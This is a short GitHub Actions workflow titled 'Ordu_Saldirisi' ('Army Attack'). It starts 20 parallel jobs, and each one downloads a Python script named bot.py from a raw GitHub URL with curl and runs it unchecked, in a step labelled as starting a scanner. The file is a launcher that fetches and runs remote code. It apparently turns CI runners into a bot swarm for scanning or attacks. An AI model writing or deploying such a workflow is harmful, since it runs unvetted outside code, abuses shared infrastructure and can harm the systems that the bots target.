name: Ordu_Saldirisi
on: [push, workflow_dispatch]
jobs:
  scan:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        thread: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    steps:
      - name: Tarayiciyi Baslat
        run: |
          curl -O https://raw.githubusercontent.com/HAYALETBEY437/ordu/main/bot.py
          python3 bot.py
